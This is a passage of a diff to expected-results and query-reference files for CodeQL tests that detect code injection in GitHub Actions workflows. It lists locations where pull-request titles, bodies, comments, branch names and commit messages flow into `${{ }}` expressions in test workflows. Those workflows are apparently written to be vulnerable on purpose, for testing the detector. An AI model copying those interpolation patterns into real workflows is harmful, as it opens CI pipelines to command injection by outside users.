.github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | -| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref index 9af8ec0f9ab1..6fc87669b07f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionCritical.ql +query: Security/CWE-094/CodeInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4bbe7da0aaf3..fc6f8aa58209 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,3 +1,62 @@ +#select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | +| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | +| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | +| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | +| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | 